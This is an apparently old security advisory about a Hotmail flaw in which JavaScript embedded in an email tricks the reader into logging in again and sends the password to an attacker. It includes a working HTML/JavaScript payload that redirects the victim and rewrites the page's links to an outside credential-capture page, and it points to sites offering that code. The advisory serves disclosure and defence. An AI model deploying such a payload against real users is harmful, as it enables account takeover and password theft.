COMMAND

    Hotmail

SYSTEMS AFFECTED

    Users having inbox on www.hotmail.com

PROBLEM

    Tom Cervenka found a serious security hole in Microsoft's  Hotmail
    service which allows malicious users to easily steal the passwords
    of Hotmail users. The  exploit involves sending an  e-mail message
    that contains embedded javascript code.  When a Hotmail user views
    the message, the  javascript code forces  the user to  re-login to
    Hotmail. In doing so, the  victim's username and password is  sent
    to the malicious user by e-mail.  See demo at:

        http://www.because-we-can.com/hotmail/default.htm

    Once a malicious user knows  the password to the victim's  Hotmail
    account, he can assume full control of the account, including  the
    ability to:

        - delete, send, and read the victim's e-mail
        - check mail on other mail servers that the victim has
          configured for mail-checking
        - access the victim's address book
        - discover other passwords sent as confirmation of
          registration in old e-mails
        - change the password of the Hotmail account

    The security problem is dangerously  easy to take advantage of.  A
    would-be hacker needs only to  embed the javascript code into  the
    body of an e-mail message using a standard e-mail program such  as
    Netscape  Mail  (free).  In  a  working  demonstration  and   full
    description  of  this  exploit  at  URL  before,  it is shown that
    even users without their  own internet service provider  (ISP) can
    steal an  arbitrary number  of Hotmail  passwords by  using a free
    Geocities account.   The "Hot"mail exploit  is a serious  security
    concern for the following reasons:

        1.The malicious code runs as soon as e-mail message is viewed
        2.The resources required to launch the attack are minnimal and
          freely available.
        3.The malicious  e-mail can  be sent  from virtually anywhere,
          including libraries, internet cafes, or classroom terminals
        4.The exploit will  work with any  javascript-enabled browser,
          including  the  Microsoft  Internet  Explorer  and  Netscape
          Communicator.

    This is a variation on the Spartan Horse announced by Dan Gregorie
    over a week ago, and covered on news.com on the 14th.  The Spartan
    Horse is available for viewing at:

        http://www.thetopoftheworld.com

    The news.com articles, is at:

        http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d

    The  variation  is  that  the  Spartan  Horse,  as  design  on the
    www.thetopoftheworld.com    site    mimicks    the    Windows95/98
    Dial-Up-Networking dialog box.

    Jonathan James studied Mr. Cervenka's findings and then started to
    experiment.   There is  a way  to do  this to  a browser  that has
    Javascripting disabled.   Just put  a META  REFRESH tag  into  the
    htmlfile,  the  URL  should  point  to  the URL which contains the
    actual capturing and sending of the password/login.  This is shown
    in  an  example  below.   This  has  been  tested  on IE 4.0 > and
    Netscape  3.0  >.   The  code  below  should  be inserted into the
    mail that is sent to the victim.

        <html>
        <meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">
        <head></head><body>
        <P>Hotmail flaw. (second version)
        <script>
        errurl="http://http://www.because-we-can.com/hotmail/default.htm";

        nomenulinks=top.submenu.document.links.length;
        for(i=0;i<nomenulinks-1;i++){
        top.submenu.document.links[i].target="work";
        top.submenu.document.links[i].href=errurl;
        }
        noworklinks=top.work.document.links.length;
        for(i=0;i<noworklinks-1;i++){
        top.work.document.links[i].target="work";
        top.work.document.links[i].href=errurl;
        }
        </script>
        </body>
        </html>

    It is also now set up a webpage that supplies you with the code:

        http://home7.swipnet.se/~w-78566/hotmail/

SOLUTION

    Both  Microsoft  and  Hotmail  have  been notified that a security
    problem  exists.  The  following  information  about the "Hot"Mail
    exploit is being made publicly  available to speed the process  of
    fixing the  security hole  and inform  users how  they can protect
    themselves.   It  appears  that  hotmail  put  a  fix  in  this by
    s/<script>/<comment>/ or some variation, when you view a message.